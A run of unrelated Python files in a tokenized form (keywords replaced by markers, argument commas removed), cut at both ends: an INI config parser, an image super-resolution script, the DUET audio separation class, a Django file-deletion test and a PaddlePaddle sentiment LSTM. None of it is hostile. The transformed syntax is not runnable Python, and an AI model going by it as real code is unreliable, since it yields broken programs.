%s.'%name)<block_end><block_end><return>jnp.asarray(ret dtype=jnp.float32)<block_end><return>step_fn<block_end><def_stmt>pad_examples x desired_batch_size<block_start>"""Expand batch to desired size by repeating last slice."""<line_sep>batch_pad=desired_batch_size-x.shape[0]<line_sep><return>np.concatenate([x np.tile(x[-1] (batch_pad 1))] axis=0)<block_end><def_stmt>tohost x<block_start>"""Collect batches from all devices to host and flatten batch dimensions."""<line_sep>n_device,n_batch,*remaining_dims=x.shape<line_sep><return>np.array(x).reshape((n_device<times>n_batch )+tuple(remaining_dims))<block_end> |
<import_from_stmt>plugin.core.environment Environment<import_from_stmt>ConfigParser NoOptionError NoSectionError ParsingError SafeConfigParser<import_stmt>logging<import_stmt>os<line_sep>log=logging.getLogger(__name__)<line_sep>CONFIGURATION_FILES=['advanced']<class_stmt>ConfigurationFile(object)<block_start><def_stmt>__init__ self path<block_start>self._path=path<line_sep>self._relpath=os.path.relpath(self._path Environment.path.plugin_support)<line_sep>self._parser=<none><line_sep>self._error=<false><block_end><def_stmt>__getitem__ self section# Ensure file is loaded
<block_start>self.load()<line_sep># Construct section
<return>ConfigurationSection(self._parser section)<block_end><def_stmt>load self<block_start><if_stmt>self._parser<or>self._error<block_start><return><block_end>log.debug('Parsing configuration file: %r' self._relpath)<try_stmt><block_start>self._parser=SafeConfigParser()<line_sep>self._parser.read(self._path)<block_end><except_stmt>ParsingError<as>ex<block_start>log.info(ex.message)<line_sep>self._parser=<none><line_sep>self._error=<true><block_end><except_stmt>Exception<as>ex<block_start>log.warn('Unable to parse configuration file: %r - %s' self._relpath ex exc_info=<true>)<line_sep>self._parser=<none><line_sep>self._error=<true><block_end><block_end><block_end><class_stmt>ConfigurationSection(object)<block_start><def_stmt>__init__ self parser name<block_start>self._parser=parser<line_sep>self._name=name<block_end><def_stmt>_get self func key default=<none><block_start><if_stmt><not>self._parser<block_start><return>default<block_end><if_stmt><not>self._parser.has_option(self._name key)<block_start><return>default<block_end><try_stmt><block_start><return>getattr(self._parser func)(self._name key)<block_end><except_stmt>(NoSectionError NoOptionError)<block_start><return>default<block_end><block_end><def_stmt>get self key default=<none><block_start><return>self._get('get' key default)<block_end><def_stmt>get_int self key default=<none><block_start><return>self._get('getint' key default)<block_end><def_stmt>get_float self key default=<none><block_start><return>self._get('getfloat' key default)<block_end><def_stmt>get_boolean self key default=<none><block_start><return>self._get('getboolean' key default)<block_end><def_stmt>__getitem__ self key<block_start><if_stmt><not>self._parser<block_start><return><none><block_end><return>self._parser.get(self._name key)<block_end><def_stmt>__setitem__ self key value<block_start><if_stmt><not>self._parser<block_start><return><block_end>self._parser.set(self._name key value)<block_end><block_end><class_stmt>ConfigurationMeta(type)<block_start><def_stmt>__new__ cls name parents dct# Load configuration files
<block_start><for_stmt>name CONFIGURATION_FILES# Build path
<block_start>path=os.path.join(Environment.path.plugin_data '%s.ini'%name)<line_sep># Parse configuration file
dct[name]=ConfigurationFile(path)<block_end># Construct object
<return>super(ConfigurationMeta cls).__new__(cls name parents dct)<block_end><block_end><class_stmt>Configuration(object)<block_start>__metaclass__=ConfigurationMeta<line_sep>advanced=<none><block_end> |
<import_stmt>os.path<import_stmt>glob<import_stmt>cv2<import_stmt>logging<import_stmt>time<import_stmt>numpy<as>np<import_from_stmt>datetime datetime<import_from_stmt>collections OrderedDict<import_stmt>hdf5storage<import_stmt>torch<import_from_stmt>utils utils_deblur<import_from_stmt>utils utils_logger<import_from_stmt>utils utils_model<import_from_stmt>utils utils_pnp<as>pnp<import_from_stmt>utils utils_sisr<as>sr<import_from_stmt>utils utils_image<as>util<line_sep>"""
Spyder (Python 3.7)
PyTorch 1.6.0
Windows 10 or Linux
<NAME> (<EMAIL>)
github: https://github.com/cszn/DPIR
https://github.com/cszn/IRCNN
https://github.com/cszn/KAIR
@article{zhang2020plug,
title={Plug-and-Play Image Restoration with Deep Denoiser Prior},
author={<NAME> <NAME> <NAME> <NAME>, <NAME>},
journal={arXiv preprint},
year={2020}
}
% If you have any question, please feel free to contact with me.
% <NAME> (e-mail: <EMAIL>; homepage: https://cszn.github.io/)
by <NAME> (01/August/2020)
# --------------------------------------------
|--model_zoo # model_zoo
|--drunet_gray # model_name, for color images
|--drunet_color
|--testset # testsets
|--results # results
# --------------------------------------------
"""<def_stmt>main <block_start>"""
# ----------------------------------------------------------------------------------
# In real applications, you should set proper
# - "noise_level_img": from [3, 25], set 3 for clean image, try 15 for very noisy LR images
# - "k" (or "kernel_width"): blur kernel is very important!!! kernel_width from [0.6, 3.0]
# to get the best performance.
# ----------------------------------------------------------------------------------
"""<line_sep>##############################################################################
testset_name='Set3C'# set test set, 'set5' | 'srbsd68'
noise_level_img=3# set noise level of image, from [3, 25], set 3 for clean image
model_name='drunet_color'# 'ircnn_color' # set denoiser, | 'drunet_color' | 'ircnn_gray' | 'drunet_gray' | 'ircnn_color'
sf=2# set scale factor, 1, 2, 3, 4
iter_num=24# set number of iterations, default: 24 for SISR
# --------------------------------
# set blur kernel
# --------------------------------
kernel_width_default_x1234=[0.6 0.9 1.7 2.2]# Gaussian kernel widths for x1, x2, x3, x4
noise_level_model=noise_level_img/255.# noise level of model
kernel_width=kernel_width_default_x1234[sf-1]<line_sep>"""
# set your own kernel width !!!!!!!!!!
"""<line_sep># kernel_width = 1.0
k=utils_deblur.fspecial('gaussian' 25 kernel_width)<line_sep>k=sr.shift_pixel(k sf)# shift the kernel
k<augdiv>np.sum(k)<line_sep>##############################################################################
show_img=<false><line_sep>util.surf(k)<if>show_img<else><none><line_sep>x8=<true># default: False, x8 to boost performance
modelSigma1=49# set sigma_1, default: 49
modelSigma2=max(sf noise_level_model<times>255.)<line_sep>classical_degradation=<true># set classical degradation or bicubic degradation
task_current='sr'# 'sr' for super-resolution
n_channels=1<if>'gray'<in>model_name<else>3# fixed
model_zoo='model_zoo'# fixed
testsets='testsets'# fixed
results='results'# fixed
result_name=testset_name+'_realapplications_'+task_current+'_'+model_name<line_sep>model_path=os.path.join(model_zoo model_name+'.pth')<line_sep>device=torch.device('cuda'<if>torch.cuda.is_available()<else>'cpu')<line_sep>torch.cuda.empty_cache()<line_sep># ----------------------------------------
# L_path, E_path, H_path
# ----------------------------------------
L_path=os.path.join(testsets testset_name)# L_path, for Low-quality images
E_path=os.path.join(results result_name)# E_path, for Estimated images
util.mkdir(E_path)<line_sep>logger_name=result_name<line_sep>utils_logger.logger_info(logger_name log_path=os.path.join(E_path logger_name+'.log'))<line_sep>logger=logging.getLogger(logger_name)<line_sep># ----------------------------------------
# load model
# ----------------------------------------
<if_stmt>'drunet'<in>model_name<block_start><import_from_stmt>models.network_unet UNetRes<as>net<line_sep>model=net(in_nc=n_channels+1 out_nc=n_channels nc=[64 128 256 512] nb=4 act_mode='R' downsample_mode="strideconv" upsample_mode="convtranspose")<line_sep>model.load_state_dict(torch.load(model_path) strict=<true>)<line_sep>model.eval()<for_stmt>_,v model.named_parameters()<block_start>v.requires_grad=<false><block_end>model=model.to(device)<block_end><elif_stmt>'ircnn'<in>model_name<block_start><import_from_stmt>models.network_dncnn IRCNN<as>net<line_sep>model=net(in_nc=n_channels out_nc=n_channels nc=64)<line_sep>model25=torch.load(model_path)<line_sep>former_idx=0<block_end>logger.info('model_name:{}, image sigma:{:.3f}, model sigma:{:.3f}'.format(model_name noise_level_img noise_level_model))<line_sep>logger.info('Model path: {:s}'.format(model_path))<line_sep>logger.info(L_path)<line_sep>L_paths=util.get_image_paths(L_path)<for_stmt>idx,img enumerate(L_paths)# --------------------------------
# (1) get img_L
# --------------------------------
<block_start>logger.info('Model path: {:s} Image: {:s}'.format(model_path img))<line_sep>img_name,ext=os.path.splitext(os.path.basename(img))<line_sep>img_L=util.imread_uint(img n_channels=n_channels)<line_sep>img_L=util.uint2single(img_L)<line_sep>img_L=util.modcrop(img_L 8)# modcrop
# --------------------------------
# (2) get rhos and sigmas
# --------------------------------
rhos,sigmas=pnp.get_rho_sigma(sigma=max(0.255/255. noise_level_model) iter_num=iter_num modelSigma1=modelSigma1 modelSigma2=modelSigma2 w=1)<line_sep>rhos,sigmas=torch.tensor(rhos).to(device) torch.tensor(sigmas).to(device)<line_sep># --------------------------------
# (3) initialize x, and pre-calculation
# --------------------------------
x=cv2.resize(img_L (img_L.shape[1]<times>sf img_L.shape[0]<times>sf) interpolation=cv2.INTER_CUBIC)<if_stmt>np.ndim(x)<eq>2<block_start>x=x[<ellipsis> <none>]<block_end><if_stmt>classical_degradation<block_start>x=sr.shift_pixel(x sf)<block_end>x=util.single2tensor4(x).to(device)<line_sep>img_L_tensor,k_tensor=util.single2tensor4(img_L) util.single2tensor4(np.expand_dims(k 2))<line_sep>[k_tensor img_L_tensor]=util.todevice([k_tensor img_L_tensor] device)<line_sep>FB,FBC,F2B,FBFy=sr.pre_calculate(img_L_tensor k_tensor sf)<line_sep># --------------------------------
# (4) main iterations
# --------------------------------
<for_stmt>i range(iter_num)<block_start>print('Iter: {} / {}'.format(i iter_num))<line_sep># --------------------------------
# step 1, FFT
# --------------------------------
tau=rhos[i].float().repeat(1 1 1 1)<line_sep>x=sr.data_solution(x FB FBC F2B FBFy tau sf)<if_stmt>'ircnn'<in>model_name<block_start>current_idx=np.int(np.ceil(sigmas[i].cpu().numpy()<times>255./2.)-1)<if_stmt>current_idx<ne>former_idx<block_start>model.load_state_dict(model25[str(current_idx)] strict=<true>)<line_sep>model.eval()<for_stmt>_,v model.named_parameters()<block_start>v.requires_grad=<false><block_end>model=model.to(device)<block_end>former_idx=current_idx<block_end># --------------------------------
# step 2, denoiser
# --------------------------------
<if_stmt>x8<block_start>x=util.augment_img_tensor4(x i%8)<block_end><if_stmt>'drunet'<in>model_name<block_start>x=torch.cat((x sigmas[i].repeat(1 1 x.shape[2] x.shape[3])) dim=1)<line_sep>x=utils_model.test_mode(model x mode=2 refield=64 min_size=256 modulo=16)<block_end><elif_stmt>'ircnn'<in>model_name<block_start>x=model(x)<block_end><if_stmt>x8<block_start><if_stmt>i%8<eq>3<or>i%8<eq>5<block_start>x=util.augment_img_tensor4(x 8-i%8)<block_end><else_stmt><block_start>x=util.augment_img_tensor4(x i%8)<block_end><block_end><block_end># --------------------------------
# (3) img_E
# --------------------------------
img_E=util.tensor2uint(x)<line_sep>util.imsave(img_E os.path.join(E_path img_name+'_x'+str(sf)+'_'+model_name+'.png'))<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end> |
<import_stmt>numpy<as>np<import_from_stmt>scipy signal<import_from_stmt>.. MaskSeparationBase<import_from_stmt>...core utils<import_from_stmt>...core constants<class_stmt>Duet(MaskSeparationBase)<block_start>"""
The DUET algorithm was originally proposed by S.Rickard and F.Dietrich for DOA
estimation and further developed for BSS and demixing by <NAME>, S.Rickard,
and <NAME>.
DUET extracts sources using the symmetric attenuation and relative delay between
two channels. The symmetric attenuation is calculated from the ratio of the two
channels' stft amplitudes, and the delay is the arrival delay between the two
sensors used to record the audio signal. These two values are clustered as peaks on
a histogram to determine where each source occurs. This implementation of DUET
creates and returns Mask objects after the run() function, which can then be
applied to the original audio signal to extract each individual source.
References:
[1] Rickard, Scott. "The DUET blind source separation algorithm."
Blind Speech Separation. Springer Netherlands, 2007. 217-241.
[2] Yilmaz, Ozgur, and <NAME>. "Blind separation of speech mixtures
via time-frequency masking."
Signal Processing, IEEE transactions on 52.7 (2004): 1830-1847.
Args:
input_audio_signal (np.array): a 2-row Numpy matrix containing samples of the
two-channel mixture.
num_sources (int): Number of sources to find.
attenuation_min (int): Minimum distance in utils.find_peak_indices, change if
not enough peaks are identified.
attenuation_max (int): Used for creating a histogram without outliers.
num_attenuation_bins (int): Number of bins for attenuation.
delay_min (int): Lower bound on delay, used as minimum distance in
utils.find_peak_indices.
delay_max (int): Upper bound on delay, used for creating a histogram without
outliers.
num_delay_bins (int): Number of bins for delay.
peak_threshold (float): Value in [0, 1] for peak picking.
attenuation_min_distance (int): Minimum distance between peaks wrt attenuation.
delay_min_distance (int): Minimum distance between peaks wrt delay.
p (int): Weight the histogram with the symmetric attenuation estimator.
q (int): Weight the histogram with the delay estimato
Notes:
On page 8 of his paper, Rickard recommends p=1 and q=0 as a default starting
point and p=.5, q=0 if one source is more dominant.
Attributes:
stft_ch0 (np.array): A Numpy matrix containing the stft data of channel 0.
stft_ch1 (np.array): A Numpy matrix containing the stft data of channel 1.
frequency_matrix (np.array): A Numpy matrix containing the frequencies of
analysis.
symmetric_atn (np.array): A Numpy matrix containing the symmetric attenuation
between the two channels.
delay (np.array): A Numpy matrix containing the delay between the two channels.
num_time_bins (np.array): The number of time bins for the frequency matrix and
mask arrays.
num_frequency_bins (int): The number of frequency bins for the mask arrays.
attenuation_bins (int): A Numpy array containing the attenuation bins for the
histogram.
delay_bins (np.array): A Numpy array containing the delay bins for the histogram.
normalized_attenuation_delay_histogram (np.array): A normalized Numpy matrix
containing the attenuation delay histogram, which has peaks for each source.
attenuation_delay_histogram (np.array): A non-normalized Numpy matrix containing
the attenuation delay histogram, which has peaks for each source.
peak_indices (np.array): A Numpy array containing the indices of the peaks for
the histogram.
separated_sources (np.array): A Numpy array of arrays containing each
separated source.
"""<def_stmt>__init__ self input_audio_signal num_sources attenuation_min=-3 attenuation_max=3 num_attenuation_bins=50 delay_min=-3 delay_max=3 num_delay_bins=50 peak_threshold=0.0 attenuation_min_distance=5 delay_min_distance=5 p=1 q=0 mask_type='binary'<block_start>super().__init__(input_audio_signal=input_audio_signal mask_type=mask_type)<line_sep>self.num_sources=num_sources<line_sep>self.attenuation_min=attenuation_min<line_sep>self.attenuation_max=attenuation_max<line_sep>self.num_attenuation_bins=num_attenuation_bins<line_sep>self.delay_min=delay_min<line_sep>self.delay_max=delay_max<line_sep>self.num_delay_bins=num_delay_bins<line_sep>self.peak_threshold=peak_threshold<line_sep>self.attenuation_min_distance=attenuation_min_distance<line_sep>self.delay_min_distance=delay_min_distance<line_sep>self.p=p<line_sep>self.q=q<line_sep>self.stft_ch0=<none><line_sep>self.stft_ch1=<none><line_sep>self.frequency_matrix=<none><line_sep>self.symmetric_atn=<none><line_sep>self.delay=<none><line_sep>self.num_time_bins=<none><line_sep>self.num_frequency_bins=<none><line_sep>self.attenuation_bins=<none><line_sep>self.delay_bins=<none><line_sep>self.normalized_attenuation_delay_histogram=<none><line_sep>self.attenuation_delay_histogram=<none><line_sep>self.peak_indices=<none><line_sep>self.delay_peak=<none><line_sep>self.atn_peak=<none><line_sep>self.separated_sources=<none><block_end><def_stmt>run self<block_start>""" Extracts N sources from a given stereo audio mixture (N sources captured via 2 sensors)
Returns:
computed_masks (np.array): A list of binary mask objects that can be used to extract the sources
Example:
.. code-block:: python
:linenos:
#Import input audio signal
input_file_name = '../Input/dev1_female3_inst_mix.wav'
signal = AudioSignal(path_to_input_file=input_file_name)
# Set up and run Duet
duet = Duet(signal, a_min=-3, a_max=3, a_num=50, d_min=-3, d_max=3, d_num=50, threshold=0.2,
a_min_distance=5, d_min_distance=5, num_sources=3)
duet.run()
# plot histogram results
duet.plot(os.path.join('..', 'Output', 'duet_2d.png'))
duet.plot(os.path.join('..', 'Output', 'duet_3d.png'), three_d_plot=True)
# Create output file for each source found
output_name_stem = os.path.join('..', 'Output', 'duet_source')
i = 1
for s in duet.make_audio_signals():
output_file_name = f"{output_name_stem}{i}.wav"
s.write_audio_to_file(output_file_name)
i += 1
"""<line_sep>self.result_masks=[]<line_sep># Calculate the stft of both channels and create the frequency matrix (the matrix containing the
# frequencies of analysis of the Fourier transform)
self.stft_ch0,self.stft_ch1,self.frequency_matrix=self._compute_spectrogram(self.sample_rate)<line_sep># Calculate the symmetric attenuation (alpha) and delay (delta) for each
# time-freq. point and return a matrix for each
self.symmetric_atn,self.delay=self._compute_atn_delay(self.stft_ch0 self.stft_ch1 self.frequency_matrix)<line_sep># Make histogram of attenuation-delay values and get the center values for the bins in this histogram
self.normalized_attenuation_delay_histogram,self.attenuation_bins,self.delay_bins=(self._make_histogram())<line_sep># Find the location of peaks in the attenuation-delay plane
self.peak_indices=utils.find_peak_indices(self.normalized_attenuation_delay_histogram self.num_sources threshold=self.peak_threshold min_dist=[self.attenuation_min_distance self.delay_min_distance])<line_sep># compute delay_peak, attenuation peak, and attenuation/delay estimates
self.delay_peak,atn_delay_est,self.atn_peak=self._convert_peaks(self.peak_indices)<line_sep># compute masks for separation
computed_masks=self._compute_masks()<line_sep><return>computed_masks<block_end><def_stmt>_compute_spectrogram self sample_rate<block_start>""" Creates the STFT matrices for channel 0 and 1, and computes the frequency matrix.
Parameter:
sample_rate (integer): sample rate
Returns:
stft_ch0 (np.matrix): a 2D Numpy matrix containing the stft of channel 0
stft_ch1 (np.matrix): a 2D Numpy matrix containing the stft of channel 1
wmat (np.matrix): a 2D Numpy matrix containing the frequencies of analysis of the Fourier transform
"""<line_sep># Compute the stft of the two channel mixtures
self.audio_signal.stft_params=self.stft_params<line_sep>self.audio_signal.stft()<line_sep>stft_ch0=self.audio_signal.get_stft_channel(0)<line_sep>stft_ch1=self.audio_signal.get_stft_channel(1)<line_sep># Compute the freq. matrix for later use in phase calculations
n_time_bins=len(self.audio_signal.time_bins_vector)<line_sep>wmat=np.array(np.tile(np.mat(self.audio_signal.freq_vector).T (1 n_time_bins)))<times>(2<times>np.pi/sample_rate)<line_sep>wmat<augadd>constants.EPSILON<line_sep><return>stft_ch0 stft_ch1 wmat<block_end>@staticmethod<def_stmt>_compute_atn_delay stft_ch0 stft_ch1 frequency_matrix# Calculate the symmetric attenuation (alpha) and delay (delta) for each
# time-freq. point
<block_start>inter_channel_ratio=(stft_ch1+constants.EPSILON)/(stft_ch0+constants.EPSILON)<line_sep>attenuation=np.abs(inter_channel_ratio)# relative attenuation between the two channels
symmetric_attenuation=attenuation-1/attenuation# symmetric attenuation
relative_delay=-np.imag(np.log(inter_channel_ratio))/(2<times>np.pi<times>frequency_matrix)# relative delay
<return>symmetric_attenuation relative_delay<block_end><def_stmt>_make_histogram self<block_start>"""Receives the stft of the two channel mixtures and the frequency matrix to a create
a smooth and normalized histogram.
Parameters:
stft_ch0 (complex np.array): a 2D Numpy matrix containing the stft of channel 0
stft_ch1 (complex np.array): a 2D Numpy matrix containing the stft of channel 1
symmetric_atn (np.array): the symmetric attenuation between two channels
delay (np.array): the time delay between 2 channels
wmat(np.array): a 2D Numpy matrix containing the frequency matrix of the signal
Returns:
histogram (np.array): a smooth and normalized histogram
atn_bins (np.array): The range of attenuation values distributed into bins
delay_bins (np.array): The range of delay values distributed into bins
"""<line_sep># calculate the weighted histogram
time_frequency_weights=(np.abs(self.stft_ch0)<times>np.abs(self.stft_ch1))<power>self.p<times>(np.abs(self.frequency_matrix))<power>self.q<line_sep># only consider time-freq. points yielding estimates in bounds
attenuation_premask=np.logical_and(self.attenuation_min<l>self.symmetric_atn self.symmetric_atn<l>self.attenuation_max)<line_sep>delay_premask=np.logical_and(self.delay_min<l>self.delay self.delay<l>self.delay_max)<line_sep>attenuation_delay_premask=np.logical_and(attenuation_premask delay_premask)<line_sep>nonzero_premask=np.nonzero(attenuation_delay_premask)<line_sep>symmetric_attenuation_vector=self.symmetric_atn[nonzero_premask]<line_sep>delay_vector=self.delay[nonzero_premask]<line_sep>time_frequency_weights_vector=time_frequency_weights[nonzero_premask]<line_sep>bins_array=np.array([self.num_attenuation_bins self.num_delay_bins])<line_sep>range_array=np.array([[self.attenuation_min self.attenuation_max] [self.delay_min self.delay_max]])<line_sep># compute the histogram
histogram,atn_bins,delay_bins=np.histogram2d(symmetric_attenuation_vector delay_vector bins=bins_array range=range_array weights=time_frequency_weights_vector)<line_sep># Save non-normalized as an option for plotting later
self.attenuation_delay_histogram=histogram<line_sep># Scale histogram from 0 to 1
histogram<augdiv>histogram.max()<line_sep># smooth the normalized histogram - local average 3-by-3 neighboring bins
histogram=self._smooth_matrix(histogram np.array([3]))<line_sep><return>histogram atn_bins delay_bins<block_end><def_stmt>_convert_peaks self peak_indices<block_start>"""Receives the attenuation and delay bins and computes the delay/attenuation
peaks based on the peak finder indices.
Returns:
delay_peak(np.array): The delay peaks determined from the histogram
atn_delay_est (np.array): The estimated symmetric attenuation and delay values
atn_peak (np.array): Attenuation converted from symmetric attenuation
"""<line_sep>atn_indices=[x[0]<for>x peak_indices]<line_sep>delay_indices=[x[1]<for>x peak_indices]<line_sep>symmetric_atn_peak=self.attenuation_bins[atn_indices]<line_sep>delay_peak=self.delay_bins[delay_indices]<line_sep>atn_delay_est=np.column_stack((symmetric_atn_peak delay_peak))<line_sep># convert symmetric_atn to atn_peak using formula from Rickard
atn_peak=(symmetric_atn_peak+np.sqrt(symmetric_atn_peak<power>2+4))/2<line_sep><return>delay_peak atn_delay_est atn_peak<block_end><def_stmt>_compute_masks self<block_start>"""Receives the attenuation and delay peaks and computes a mask to be applied to the signal for source
separation.
"""<line_sep># compute masks for separation
best_so_far=np.inf<times>np.ones_like(self.stft_ch0 dtype=float)<for_stmt>i range(0 self.num_sources)<block_start>mask_array=np.zeros_like(self.stft_ch0 dtype=bool)<line_sep>phase=np.exp(-1j<times>self.frequency_matrix<times>self.delay_peak[i])<line_sep>score=np.abs(self.atn_peak[i]<times>phase<times>self.stft_ch0-self.stft_ch1)<power>2/(1+self.atn_peak[i]<power>2)<line_sep>mask=(score<l>best_so_far)<line_sep>mask_array[mask]=<true><line_sep>background_mask=self.mask_type(np.array(mask_array))<line_sep>self.result_masks.append(background_mask)<line_sep>self.result_masks[0].mask=np.logical_xor(self.result_masks[i].mask self.result_masks[0].mask)<line_sep>best_so_far[mask]=score[mask]<block_end># Compute first mask based on what the other masks left remaining
self.result_masks[0].mask=np.logical_not(self.result_masks[0].mask)<line_sep><return>self.result_masks<block_end>@staticmethod<def_stmt>_smooth_matrix matrix kernel<block_start>"""Performs two-dimensional convolution in order to smooth the values of matrix elements.
(similar to low-pass filtering)
Parameters:
matrix (np.array): a 2D Numpy matrix to be smoothed
kernel (np.array): a 2D Numpy matrix containing kernel values
Note:
if Kernel is of size 1 by 1 (scalar), a Kernel by Kernel matrix of 1/Kernel**2 will be used as the matrix
averaging kernel
Output:
smoothed_matrix (np.array): a 2D Numpy matrix containing a smoothed version of Mat (same size as Mat)
"""<line_sep># check the dimensions of the Kernel matrix and set the values of the averaging
# matrix, kernel_matrix
kernel_matrix=np.ones((kernel[0] kernel[0]))/kernel[0]<power>2<line_sep>krow,kcol=np.shape(kernel_matrix)<line_sep># adjust the matrix dimension for convolution
copy_row=int(np.floor(krow/2))# number of rows to copy on top and bottom
copy_col=int(np.floor(kcol/2))# number of columns to copy on either side
# TODO: This is very ugly. Make this readable.
# form the augmented matrix (rows and columns added to top, bottom, and sides)
matrix=np.mat(matrix)# make sure Mat is a Numpy matrix
augmented_matrix=np.vstack([np.hstack([matrix[0 0]<times>np.ones((copy_row copy_col)) np.ones((copy_row 1))<times>matrix[0 :] matrix[0 -1]<times>np.ones((copy_row copy_col))]) np.hstack([matrix[: 0]<times>np.ones((1 copy_col)) matrix matrix[: -1]<times>np.ones((1 copy_col))]) np.hstack([matrix[-1 1]<times>np.ones((copy_row copy_col)) np.ones((copy_row 1))<times>matrix[-1 :] matrix[-1 -1]<times>np.ones((copy_row copy_col))])])<line_sep># perform two-dimensional convolution between the input matrix and the kernel
smooted_matrix=signal.convolve2d(augmented_matrix kernel_matrix[::-1 ::-1] mode='valid')<line_sep><return>smooted_matrix<block_end><block_end> |
<import_from_future_stmt> unicode_literals<import_stmt>os<import_stmt>django<import_from_stmt>django.test TestCase<import_from_stmt>mock call patch<import_from_stmt>storage.brokers.host_broker HostBroker<import_from_stmt>storage.delete_files_job delete_files<import_from_stmt>storage.test utils<as>storage_test_utils<class_stmt>TestDeleteFiles(TestCase)<block_start><def_stmt>setUp self<block_start>django.setup()<line_sep>self.broker=HostBroker()<line_sep>self.broker.load_configuration({'type':HostBroker().broker_type 'host_path':'/host/path'})<block_end>@patch('storage.brokers.host_broker.os.path.exists')@patch('storage.brokers.host_broker.os.remove')<def_stmt>test_delete_file self mock_remove mock_exists<block_start>"""Tests removing a file"""<def_stmt>new_exists path<block_start><return><true><block_end>mock_exists.side_effect=new_exists<line_sep>volume_path=os.path.join('the' 'volume' 'path')<line_sep>file_path_1=os.path.join('my_dir' 'my_file.txt')<line_sep>file_path_2=os.path.join('my_dir' 'my_file.json')<line_sep>full_path_file_1=os.path.join(volume_path file_path_1)<line_sep>full_path_file_2=os.path.join(volume_path file_path_2)<line_sep>file_1=storage_test_utils.create_file(file_path=file_path_1)<line_sep>file_2=storage_test_utils.create_file(file_path=file_path_2)<line_sep># Call function
test_1=delete_files([file_1] volume_path self.broker)<line_sep>self.assertEqual(test_1 <none>)<line_sep>test_2=delete_files([file_2] volume_path self.broker)<line_sep>self.assertEqual(test_2 <none>)<line_sep># Check results
two_calls=[call(full_path_file_1) call(full_path_file_2)]<line_sep>mock_remove.assert_has_calls(two_calls)<block_end><block_end> |
# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_stmt>paddle<import_stmt>paddle.nn.functional<as>F<import_from_stmt>paddle.nn LSTM Embedding Dropout Linear<import_stmt>numpy<as>np<class_stmt>SentimentClassifier(paddle.nn.Layer)<block_start><def_stmt>__init__ self hidden_size vocab_size class_num=2 num_steps=128 num_layers=1 init_scale=0.1 dropout=<none># ๅๆฐๅซไนๅฆไธ๏ผ
# 1.hidden_size๏ผ่กจ็คบembedding-size๏ผhiddenๅcellๅ้็็ปดๅบฆ
# 2.vocab_size๏ผๆจกๅๅฏไปฅ่่็่ฏ่กจๅคงๅฐ
# 3.class_num๏ผๆ
ๆ็ฑปๅไธชๆฐ๏ผๅฏไปฅๆฏ2ๅ็ฑป๏ผไนๅฏไปฅๆฏๅคๅ็ฑป
# 4.num_steps๏ผ่กจ็คบ่ฟไธชๆ
ๆๅๆๆจกๅๆๅคงๅฏไปฅ่่็ๅฅๅญ้ฟๅบฆ
# 5.num_layers๏ผ่กจ็คบ็ฝ็ป็ๅฑๆฐ
# 6.init_scale๏ผ่กจ็คบ็ฝ็ปๅ
้จ็ๅๆฐ็ๅๅงๅ่ๅด
# ้ฟ็ญๆถ่ฎฐๅฟ็ฝ็ปๅ
้จ็จไบๅพๅคTanh๏ผSigmoid็ญๆฟๆดปๅฝๆฐ๏ผ่ฟไบๅฝๆฐๅฏนๆฐๅผ็ฒพๅบฆ้ๅธธๆๆ๏ผ
# ๅ ๆญคๆไปฌไธ่ฌๅชไฝฟ็จๆฏ่พๅฐ็ๅๅงๅ่ๅด๏ผไปฅไฟ่ฏๆๆ
<block_start>super(SentimentClassifier self).__init__()<line_sep>self.hidden_size=hidden_size<line_sep>self.vocab_size=vocab_size<line_sep>self.class_num=class_num<line_sep>self.init_scale=init_scale<line_sep>self.num_layers=num_layers<line_sep>self.num_steps=num_steps<line_sep>self.dropout=dropout<line_sep># ๅฃฐๆไธไธชLSTMๆจกๅ๏ผ็จๆฅๆๆฏไธชๅฅๅญๆฝ่ฑกๆๅ้
self.simple_lstm_rnn=LSTM(input_size=hidden_size hidden_size=hidden_size num_layers=num_layers)<line_sep># ๅฃฐๆไธไธชembeddingๅฑ๏ผ็จๆฅๆๅฅๅญไธญ็ๆฏไธช่ฏ่ฝฌๆขไธบๅ้
self.embedding=Embedding(num_embeddings=vocab_size embedding_dim=hidden_size sparse=<false> weight_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Uniform(low=-init_scale high=init_scale)))<line_sep># ๅจๅพๅฐไธไธชๅฅๅญ็ๅ้่กจ็คบๅ๏ผ้่ฆๆ นๆฎ่ฟไธชๅ้่กจ็คบๅฏน่ฟไธชๅฅๅญ่ฟ่กๅ็ฑป
# ไธ่ฌๆฅ่ฏด๏ผๅฏไปฅๆ่ฟไธชๅฅๅญ็ๅ้่กจ็คบไนไปฅไธไธชๅคงๅฐไธบ[self.hidden_size, self.class_num]็Wๅๆฐ๏ผ
# ๅนถๅ ไธไธไธชๅคงๅฐไธบ[self.class_num]็bๅๆฐ๏ผไป่่พพๅฐๆๅฅๅญๅ้ๆ ๅฐๅฐๅ็ฑป็ปๆ็็ฎ็
# ๆไปฌ้่ฆๅฃฐๆๆ็ปๅจไฝฟ็จๅฅๅญๅ้ๆ ๅฐๅฐๅ
ทไฝๆ
ๆ็ฑปๅซ่ฟ็จไธญๆ้่ฆไฝฟ็จ็ๅๆฐ
# ่ฟไธชๅๆฐ็ๅคงๅฐไธ่ฌๆฏ[self.hidden_size, self.class_num]
self.cls_fc=Linear(in_features=self.hidden_size out_features=self.class_num weight_attr=<none> bias_attr=<none>)<line_sep>self.dropout_layer=Dropout(p=self.dropout mode='upscale_in_train')<block_end><def_stmt>forward self input label<block_start>batch_size=len(input)<line_sep># ้ฆๅ
ๆไปฌ้่ฆๅฎไนLSTM็ๅๅงhiddenๅcell๏ผ่ฟ้ๆไปฌไฝฟ็จ0ๆฅๅๅงๅ่ฟไธชๅบๅ็่ฎฐๅฟ
init_hidden_data=np.zeros((self.num_layers batch_size self.hidden_size) dtype='float32')<line_sep>init_cell_data=np.zeros((self.num_layers batch_size self.hidden_size) dtype='float32')<line_sep># ๅฐ่ฟไบๅๅง่ฎฐๅฟ่ฝฌๆขไธบ้ฃๆกจๅฏ่ฎก็ฎ็ๅ้
# ่ฎพ็ฝฎstop_gradient=True๏ผ้ฟๅ
